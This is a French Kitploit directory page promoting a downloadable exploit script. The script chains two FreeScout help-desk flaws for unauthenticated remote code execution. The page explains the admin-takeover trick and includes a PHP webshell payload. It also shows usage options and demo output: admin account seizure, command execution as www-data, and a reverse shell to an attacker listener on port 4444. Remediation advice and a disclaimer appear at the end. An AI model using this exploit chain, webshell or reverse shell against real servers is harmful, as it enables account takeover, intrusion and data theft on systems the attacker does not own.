Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-53595_exploit — Script d'exploitation enchaînant CVE-2026-53595 (prise de contrôle de compte anonyme) et CVE-2026-53593 (téléchargement .pht) pour une exécution de code à distance non authentifiée sur le logiciel de bureau d'aide FreeScout. | Kitploit
Outils/GitHubGitHub/0xdak/cve-2026-53595_exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHub0xdak/cve-2026-53595_exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-53595_exploit

Script d'exploitation enchaînant CVE-2026-53595 (prise de contrôle de compte anonyme) et CVE-2026-53593 (téléchargement .pht) pour une exécution de code à distance non authentifiée sur le logiciel de bureau d'aide FreeScout.

Voir le dépôt
il y a 1 moisPas encore vérifié

CVE-2026-53595 (+ CVE-2026-53593) — Prise de contrôle anonyme de FreeScout → RCE

Exécution de code à distance non authentifiée dans FreeScout ≤ 1.8.223 (un service d'assistance Laravel) en enchaînant deux failles, toutes deux corrigées dans 1.8.224 :

  • CVE-2026-53595 — prise de contrôle anonyme de compte. POST /user-setup/{hash}/{invite_sent_at} sélectionne le compte uniquement par sa colonne invite_hash. Un utilisateur activé a invite_hash = '', et sur MySQL/MariaDB, l'égalité VARCHAR ignore les espaces de fin, donc hash = %20 correspond à l'administrateur. La porte d'expiration invite_sent_at déchiffre la valeur avec le mot de passe de l'utilisateur comme clé, mais l'assistant de déchiffrement renvoie l'entrée brute en cas d'échec (catch vide), donc un horodatage unix actuel en texte clair est accepté. Le point de terminaison écrase ensuite l'email et le mot de passe du compte et vous connecte.
  • CVE-2026-53593 — téléchargement authentifié de .pht. La liste noire des téléchargements (php.*|sh|pl|phtml|phar) ne couvre pas .pht, qu'Apache mod_php exécute comme du PHP.

En les enchaînant, un attaquant non authentifié obtient une exécution de code en tant qu'utilisateur du serveur web (www-data).

Ce qu'il fait

  1. GET /user-setup/%20/<unix_ts> pour obtenir un cookie de session + un jeton CSRF.
  2. POST la même URL pour écraser l'email/mot de passe de l'administrateur et se connecter (prise de contrôle).
  3. POST /uploads/upload un shell.pht (<?php system($_GET['c']); ?>).
  4. Exécute une commande via la webshell, ou ouvre un shell inversé.

Utilisation

root@kitploit:~
./exploit.sh -t <target> [options]
   -t, --target URL     URL de base cible (ex. http://10.10.10.10)   [obligatoire]
   -c, --cmd CMD        exécuter une commande unique (défaut : id)
       --lhost IP       shell inversé : IP de l'attaquant (démarrez nc d'abord)
       --lport PORT     port du shell inversé (défaut : 4444)
       --email ADDR     email à définir pour l'administrateur saisi (défaut : [email protected])
       --password PASS  mot de passe à définir (défaut : Pwned12345)
   -h, --help

Démo

root@kitploit:~
$ ./exploit.sh -t http://10.10.10.10
[*] fetching setup form (hash=%20, ts=1784500000) ...
[*] seizing admin -> [email protected] / Pwned12345 ...
[+] admin account taken over (you can also log in at http://10.10.10.10/login)
[*] uploading .pht webshell ...
[+] webshell: http://10.10.10.10/storage/uploads/p2Bj81XDu6DbBJ4Sq5mYW05zY.pht
[+] id -> uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ./exploit.sh -t http://10.10.10.10 -c 'cat /var/www/local.txt'
...
[+] cat /var/www/local.txt -> f1a7c30e9b6d24851e6d24851f1a7c30

# reverse shell (run `nc -lvnp 4444` first)
$ ./exploit.sh -t http://10.10.10.10 --lhost 10.10.14.7 --lport 4444
[+] admin account taken over ...
[+] webshell: http://10.10.10.10/storage/uploads/....pht
[*] sending reverse shell to 10.10.14.7:4444 ...
[+] payload sent — check your listener.

Prérequis

  • bash, curl, jq

Remarques

  • Fonctionne sur FreeScout 1.0.x – 1.8.223 ; 1.8.224+ corrige les deux bugs (302 devient un échec de prise de contrôle).
  • L'exécution de code se fait en tant que www-data (utilisateur d'Apache). L'exécution de .pht dépend du serveur qui exécute .pht via mod_php — l'environnement "Apache standard + libapache2-mod-php" que le CVE cible.
  • Le shell inversé est encodé en base64 avant d'atteindre la webshell : system() s'exécute via /bin/sh (dash sur Debian/Ubuntu), qui ne comprend pas la redirection bash >& /dev/tcp/..., et base64 évite également tous les pièges de citation.
  • Le mot de passe par défaut n'a pas de ! intentionnellement — ! déclenche l'expansion de l'historique dans bash/zsh interactif et altère les commandes collées.

Correctifs

  • Mettez à jour vers FreeScout 1.8.224+.
  • N'utilisez jamais l'égalité VARCHAR pour les jetons de sécurité (collisions d'espaces de fin), et ne traitez jamais un déchiffrement échoué comme une valeur valide — rejetez les jetons vides/invalides.
  • Utilisez une liste blanche de téléchargements, stockez les téléchargements en dehors de la racine web, et servez-les via un gestionnaire qui ne les exécute jamais.

Avertissement

Uniquement à des fins de tests de sécurité autorisés et d'éducation. Ne l'utilisez pas contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Télécharger l’outil